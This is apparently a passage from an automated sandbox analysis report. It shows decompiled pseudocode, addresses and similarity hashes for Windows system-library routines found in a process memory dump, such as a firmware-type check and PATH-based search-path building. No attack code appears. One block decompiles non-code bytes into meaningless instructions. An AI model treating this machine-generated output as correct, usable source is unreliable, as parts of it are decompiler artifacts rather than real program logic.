					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E017EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L017C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E017EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0182500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E017E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                      0x018251be
                                                      0x018251c3
                                                      0x018251c8
                                                      0x018251cd
                                                      0x018251d0
                                                      0x018251d3
                                                      0x018251d8
                                                      0x018251db
                                                      0x018251de
                                                      0x018251e0
                                                      0x018251e3
                                                      0x018251e6
                                                      0x018251e8
                                                      0x01825342
                                                      0x01825351
                                                      0x01825356
                                                      0x0182535a
                                                      0x01825360
                                                      0x01825363
                                                      0x01825366
                                                      0x01825369
                                                      0x01825369
                                                      0x0182536b
                                                      0x0182536b
                                                      0x01825370
                                                      0x018253a3
                                                      0x018253a4
                                                      0x018253a6
                                                      0x018253ab
                                                      0x018253ab
                                                      0x018253ae
                                                      0x018253ae
                                                      0x018253b5
                                                      0x018253bf
                                                      0x018253bf
                                                      0x01825375
                                                      0x01825396
                                                      0x018253a0
                                                      0x018253a0
                                                      0x00000000
                                                      0x01825396
                                                      0x01825377
                                                      0x01825379
                                                      0x0182537f
                                                      0x0182538c
                                                      0x01825390
                                                      0x00000000
                                                      0x01825390
                                                      0x018251ee
                                                      0x018251f1
                                                      0x01825301
                                                      0x01825310
                                                      0x01825315
                                                      0x01825318
                                                      0x0182531b
                                                      0x01825320
                                                      0x0182532e
                                                      0x01825331
                                                      0x00000000
                                                      0x01825331
                                                      0x01825328
                                                      0x01825329
                                                      0x00000000
                                                      0x01825329
                                                      0x018251fa
                                                      0x01825235
                                                      0x01825236
                                                      0x01825239
                                                      0x0182523f
                                                      0x01825240
                                                      0x01825241
                                                      0x01825242
                                                      0x01825246
                                                      0x01825247
                                                      0x0182524e
                                                      0x01825251
                                                      0x01825267
                                                      0x01825269
                                                      0x0182526e
                                                      0x0182527d
                                                      0x0182527e
                                                      0x01825281
                                                      0x01825282
                                                      0x01825287
                                                      0x01825288
                                                      0x0182528a
                                                      0x0182528f
                                                      0x01825294
                                                      0x00000000
                                                      0x00000000
                                                      0x0182529a
                                                      0x0182529c
                                                      0x0182529e
                                                      0x0182529e
                                                      0x018252a4
                                                      0x018252b0
                                                      0x00000000
                                                      0x00000000
                                                      0x018252ba
                                                      0x018252bc
                                                      0x018252bc
                                                      0x018252d4
                                                      0x018252d9
                                                      0x018252dc
                                                      0x018252e1
                                                      0x00000000
                                                      0x00000000
                                                      0x018252e7
                                                      0x018252f4
                                                      0x00000000
                                                      0x018252f4
                                                      0x01825270
                                                      0x00000000
                                                      0x01825270
                                                      0x018251fc
                                                      0x018251fd
                                                      0x01825202
                                                      0x01825203
                                                      0x01825205
                                                      0x0182520a
                                                      0x0182520f
                                                      0x00000000
                                                      0x00000000
                                                      0x0182521b
                                                      0x01825226
                                                      0x0182522b
                                                      0x0182521d
                                                      0x0182521d
                                                      0x01825222
                                                      0x01825222
                                                      0x0182522d
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                      • Instruction ID: 008318ce3e15eef821459af737733174a08b5b851112c97771b97861ac569822
                                                      • Opcode Fuzzy Hash: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                      • Instruction Fuzzy Hash: 665190B1A807199FDB26DFA8C844BEDBBF8FF49700F14402DE649EB291D6709A40CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017D2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E017D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				char _v3;
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t235;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				signed int _t276;
				signed int _t278;
				void* _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				intOrPtr* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				void* _t327;
				signed int _t328;
				signed int _t330;
				signed int _t333;
				void* _t334;
				void* _t336;

				_t330 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x189d360 ^ _t330;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x189b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t336 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t276 = 0x48;
				_t305 = 0 | _t336 == 0x00000000;
				_t316 = 0;
				_v37 = _t336 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L017C4620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *(_t323 + 0x3c) = _t276;
							_t278 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x1898478;
								 *_t323 = ((0 | _t305 == 0x01898478) - 0x00000001 & 0xfffffffb) + 7;
								E017EF3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t334 = _t334 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E018339F2(_t318);
									_t305 = _v32;
									_t318 = _t270;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t323 + _t278 * 4;
								_v56 = _t276;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t235 =  *(_v60 + _t289 * 4);
										__eflags = _t235;
										if(_t235 == 0) {
											goto L30;
										} else {
											__eflags = _t235 == 5;
											if(_t235 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t289 * 4);
										 *(_t276 + 0x18) = _t318;
										_t239 =  *(_v60 + _t289 * 4);
										__eflags = _t239 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t239 * 4 +  &M017D2959))) {
												case 0:
													__ax =  *0x1898488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E017EF3E0(__edi,  *0x189848c, __ax & 0x0000ffff);
														__eax =  *0x1898488 & 0x0000ffff;
														goto L26;
													}
													goto L118;
												case 1:
													L45:
													E017EF3E0(_t318, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x1898480 & 0x0000ffff = E017EF3E0(__edi,  *0x1898484,  *0x1898480 & 0x0000ffff);
													__eax =  *0x1898480 & 0x0000ffff;
													__eax = ( *0x1898480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E017EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L118;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E017EF3E0(_t318, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t318 = _t318 + (_t265 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t318 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx =  *0x189575c;
													__eflags = __ebx - 0x189575c;
													if(__ebx != 0x189575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E017EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x189575c;
														} while (__ebx != 0x189575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1898478 & 0x0000ffff = E017EF3E0(__edi,  *0x189847c,  *0x1898478 & 0x0000ffff);
													__eax =  *0x1898478 & 0x0000ffff;
													__eax = ( *0x1898478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1896e58 & 0x0000ffff = E017EF3E0(__edi,  *0x1896e5c,  *0x1896e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1896e58 & 0x0000ffff;
													__eax = ( *0x1896e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L118;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t239 =  *(_v60 + _t316 * 4);
						if(_t239 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t239 * 4 +  &M017D2935))) {
							case 0:
								__ax =  *0x1898488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E017D2E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1898480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1898480;
									goto L90;
								}
								goto L14;
							case 3:
								__eax = E017BEEF0(0x18979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L67();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E017BEB70(__ecx, 0x18979a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t213 = _v72;
											__eflags = _t213;
											if(_t213 != 0) {
												L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
											}
											_t214 = _v52;
											__eflags = _t214;
											if(_t214 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
													_t214 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1897b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E017BEB70(__ecx, 0x18979a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t330;
										_pop(_t277);
										return E017EB640(_t214, _t277, _v8 ^ _t330, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L67();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L118;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t274 = E017D2E3E(_t272,  &_v36);
									_t285 = _v36;
									_v76 = _t274;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x1895764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1898478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1898478;
									L90:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1896e58 & 0x0000ffff;
								__eax = ( *0x1896e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L118;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags < 0) {
						asm("o16 sub [ebp+0x1], bh");
					}
					_t105 =  &_v3;
					 *_t105 = _v3 - _t276;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags < 0) {
						if (__eflags >= 0) goto L62;
					}
					if(__eflags < 0) {
						_t323 = _t323 + 1;
						__eflags = _t323;
					}
					_v3 = _v3 - _t276;
					_pop(_t280);
					 *_t290 =  *_t290 + 0x17d2894;
					_v3 = _v3 - _t318;
					 *(_t239 + 0x1f017d26 ^ 0x0201815b) =  *(_t239 + 0x1f017d26 ^ 0x0201815b) - 0x7d;
					_t326 = _t323 + _t323;
					__eflags = _t326;
					asm("daa");
					if(_t326 < 0) {
						_push(ds);
					}
					_v3 = _v3 - _t280;
					_t327 = _t326 - 1;
					_t113 =  &_v3;
					 *_t113 = _v3 - _t280;
					__eflags =  *_t113;
					asm("daa");
					if( *_t113 < 0) {
						asm("fcomp dword [ebx-0x7f]");
					}
					_pop(_t281);
					 *_t290 =  *_t290 + 0x17d28b4;
					 *_t290 =  *_t290 + 0xcccccccc;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x187ff00);
					E017FD08C(_t281, _t318, _t327);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t328 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t295 = _t247 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x1781664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E017EE5C0(_a8,  *((intOrPtr*)(_t295 + 0x1781668)), _t282);
									_t334 = _t334 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t328 = E018251BE(_t282,  *((intOrPtr*)(_v48 + 0x178166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
										_v52 = _t328;
										break;
									} else {
										_t247 = _v40;
										goto L72;
									}
									goto L80;
								} else {
									L72:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t328;
						__eflags = _t328;
						if(_t328 < 0) {
							__eflags = _t328 - 0xc0000100;
							if(_t328 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t328 = 0xc0000100;
										goto L86;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L116:
												_t328 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t328;
												__eflags = _t328 - 0xc0000100;
												if(_t328 != 0xc0000100) {
													goto L79;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L85;
												}
											} else {
												_t252 = E017B6600( *(_t307 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L116;
												} else {
													_t291 = _a4;
													goto L85;
												}
											}
										} else {
											L85:
											_t328 = E017D2C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L86:
											_v32 = _t328;
											goto L79;
										}
									}
									goto L118;
								} else {
									E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t328 = _a24;
									_t259 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E017D2C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
									}
									_v8 = _t319;
									E017D2ACB();
								}
							}
						}
						L79:
						_v8 = 0xfffffffe;
						_t245 = _t328;
					}
					L80:
					return E017FD0D1(_t245);
				}
				L118:
			}






















































                                                      0x017d2584
                                                      0x017d2586
                                                      0x017d2590
                                                      0x017d2596
                                                      0x017d2597
                                                      0x017d2598
                                                      0x017d2599
                                                      0x017d259e
                                                      0x017d25a4
                                                      0x017d25a9
                                                      0x017d25ac
                                                      0x017d25ae
                                                      0x017d25b1
                                                      0x017d25b2
                                                      0x017d25b5
                                                      0x017d25b8
                                                      0x017d25bb
                                                      0x017d25bc
                                                      0x017d25bf
                                                      0x017d25c2
                                                      0x017d25c5
                                                      0x017d25c6
                                                      0x017d25cb
                                                      0x017d25ce
                                                      0x017d25d8
                                                      0x017d25db
                                                      0x017d25dd
                                                      0x017d25de
                                                      0x017d25e1
                                                      0x017d25e3
                                                      0x017d25e9
                                                      0x017d26da
                                                      0x017d26da
                                                      0x017d26dd
                                                      0x017d26e2
                                                      0x01815b56
                                                      0x00000000
                                                      0x017d26e8
                                                      0x017d26f9
                                                      0x017d26fb
                                                      0x017d26fe
                                                      0x017d2700
                                                      0x01815b60
                                                      0x00000000
                                                      0x017d2706
                                                      0x017d2706
                                                      0x017d270a
                                                      0x017d270a
                                                      0x017d270d
                                                      0x017d2713
                                                      0x017d2716
                                                      0x017d2718
                                                      0x017d271c
                                                      0x017d271e
                                                      0x01815b6c
                                                      0x01815b6f
                                                      0x01815b7f
                                                      0x01815b89
                                                      0x01815b8e
                                                      0x01815b93
                                                      0x01815b96
                                                      0x01815b9c
                                                      0x01815ba0
                                                      0x01815ba3
                                                      0x01815bab
                                                      0x01815bb0
                                                      0x01815bb3
                                                      0x01815bb3
                                                      0x01815ba3
                                                      0x017d2724
                                                      0x017d2726
                                                      0x017d2729
                                                      0x017d272c
                                                      0x017d279d
                                                      0x017d279d
                                                      0x017d27a0
                                                      0x017d27a2
                                                      0x00000000
                                                      0x017d272e
                                                      0x017d272e
                                                      0x017d2731
                                                      0x017d2734
                                                      0x017d2734
                                                      0x017d2736
                                                      0x01815bc1
                                                      0x01815bc1
                                                      0x01815bc4
                                                      0x00000000
                                                      0x01815bca
                                                      0x01815bca
                                                      0x01815bcd
                                                      0x00000000
                                                      0x01815bd3
                                                      0x00000000
                                                      0x01815bd3
                                                      0x01815bcd
                                                      0x017d273c
                                                      0x017d273c
                                                      0x017d2742
                                                      0x017d2747
                                                      0x017d274a
                                                      0x017d274d
                                                      0x017d2750
                                                      0x00000000
                                                      0x017d2756
                                                      0x017d2756
                                                      0x00000000
                                                      0x017d2902
                                                      0x017d2908
                                                      0x017d290b
                                                      0x00000000
                                                      0x017d2911
                                                      0x017d291c
                                                      0x017d2921
                                                      0x00000000
                                                      0x017d2921
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2880
                                                      0x017d2887
                                                      0x017d288c
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2805
                                                      0x017d280a
                                                      0x017d2814
                                                      0x017d2816
                                                      0x00000000
                                                      0x00000000
                                                      0x017d281e
                                                      0x017d2821
                                                      0x017d2823
                                                      0x00000000
                                                      0x017d2829
                                                      0x017d2829
                                                      0x017d2831
                                                      0x017d283c
                                                      0x017d283e
                                                      0x00000000
                                                      0x017d283e
                                                      0x00000000
                                                      0x00000000
                                                      0x017d284e
                                                      0x017d2850
                                                      0x017d2851
                                                      0x017d2854
                                                      0x017d2857
                                                      0x017d285a
                                                      0x017d285c
                                                      0x017d285d
                                                      0x00000000
                                                      0x00000000
                                                      0x017d275d
                                                      0x017d2761
                                                      0x00000000
                                                      0x017d2767
                                                      0x017d276e
                                                      0x017d2773
                                                      0x017d2773
                                                      0x017d2776
                                                      0x017d2778
                                                      0x017d277e
                                                      0x017d277e
                                                      0x017d2781
                                                      0x017d2781
                                                      0x017d2783
                                                      0x017d2784
                                                      0x00000000
                                                      0x00000000
                                                      0x01815bd8
                                                      0x01815bde
                                                      0x01815be4
                                                      0x01815be6
                                                      0x01815be8
                                                      0x01815be9
                                                      0x01815bee
                                                      0x01815bf8
                                                      0x01815bff
                                                      0x01815c01
                                                      0x01815c04
                                                      0x01815c07
                                                      0x01815c0b
                                                      0x01815c0d
                                                      0x01815c0d
                                                      0x01815c15
                                                      0x01815c18
                                                      0x01815c1b
                                                      0x01815c1b
                                                      0x01815c1e
                                                      0x00000000
                                                      0x00000000
                                                      0x017d28c3
                                                      0x017d28c8
                                                      0x017d28d2
                                                      0x017d28d4
                                                      0x017d28d8
                                                      0x017d28db
                                                      0x01815c26
                                                      0x01815c28
                                                      0x01815c2d
                                                      0x01815c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x01815c34
                                                      0x01815c36
                                                      0x01815c49
                                                      0x01815c4e
                                                      0x01815c54
                                                      0x01815c5b
                                                      0x01815c5d
                                                      0x01815c60
                                                      0x017d2788
                                                      0x017d2788
                                                      0x017d278b
                                                      0x017d278e
                                                      0x017d278e
                                                      0x017d278e
                                                      0x017d2791
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2756
                                                      0x017d2750
                                                      0x00000000
                                                      0x017d2794
                                                      0x017d2794
                                                      0x017d2795
                                                      0x017d2798
                                                      0x017d2798
                                                      0x00000000
                                                      0x017d2734
                                                      0x017d272c
                                                      0x017d2700
                                                      0x017d25ef
                                                      0x017d25ef
                                                      0x017d25ef
                                                      0x017d25f2
                                                      0x017d25f8
                                                      0x00000000
                                                      0x00000000
                                                      0x017d25fe
                                                      0x00000000
                                                      0x017d28e6
                                                      0x017d28ec
                                                      0x017d28ef
                                                      0x017d28f5
                                                      0x017d28f8
                                                      0x017d28f8
                                                      0x00000000
                                                      0x017d28f8
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2866
                                                      0x017d2866
                                                      0x017d2876
                                                      0x017d2879
                                                      0x00000000
                                                      0x00000000
                                                      0x017d27e0
                                                      0x017d27e7
                                                      0x017d27e9
                                                      0x017d27eb
                                                      0x01815afd
                                                      0x00000000
                                                      0x01815afd
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2633
                                                      0x017d2638
                                                      0x017d263b
                                                      0x017d263c
                                                      0x017d263e
                                                      0x017d2640
                                                      0x017d2642
                                                      0x017d2647
                                                      0x017d2649
                                                      0x017d264e
                                                      0x017d2650
                                                      0x017d2653
                                                      0x017d2659
                                                      0x017d26a2
                                                      0x017d26a7
                                                      0x017d26ac
                                                      0x017d26b2
                                                      0x01815b11
                                                      0x01815b15
                                                      0x01815b17
                                                      0x00000000
                                                      0x017d26b8
                                                      0x017d26b8
                                                      0x017d26ba
                                                      0x017d27a6
                                                      0x017d27a6
                                                      0x017d27a9
                                                      0x017d27ab
                                                      0x017d27b9
                                                      0x017d27b9
                                                      0x017d27be
                                                      0x017d27c1
                                                      0x017d27c3
                                                      0x017d27c5
                                                      0x017d27c7
                                                      0x01815c74
                                                      0x01815c79
                                                      0x01815c79
                                                      0x017d27c7
                                                      0x00000000
                                                      0x017d26c0
                                                      0x017d26c0
                                                      0x017d26c3
                                                      0x017d26c6
                                                      0x017d26c6
                                                      0x017d26c9
                                                      0x017d26c9
                                                      0x00000000
                                                      0x017d26c9
                                                      0x017d26ba
                                                      0x017d265b
                                                      0x017d265b
                                                      0x017d265e
                                                      0x017d2667
                                                      0x017d266d
                                                      0x017d2677
                                                      0x017d267c
                                                      0x017d267f
                                                      0x017d2681
                                                      0x01815b49
                                                      0x01815b4e
                                                      0x017d27cd
                                                      0x017d27d0
                                                      0x017d27d1
                                                      0x017d27d2
                                                      0x017d27d4
                                                      0x017d27dd
                                                      0x017d2687
                                                      0x017d2687
                                                      0x017d268a
                                                      0x017d268b
                                                      0x017d268e
                                                      0x017d268f
                                                      0x017d2691
                                                      0x017d2696
                                                      0x017d2698
                                                      0x017d269d
                                                      0x017d269f
                                                      0x00000000
                                                      0x017d269f
                                                      0x017d2681
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2846
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2605
                                                      0x017d260a
                                                      0x017d260c
                                                      0x017d2611
                                                      0x017d2616
                                                      0x017d2619
                                                      0x017d2619
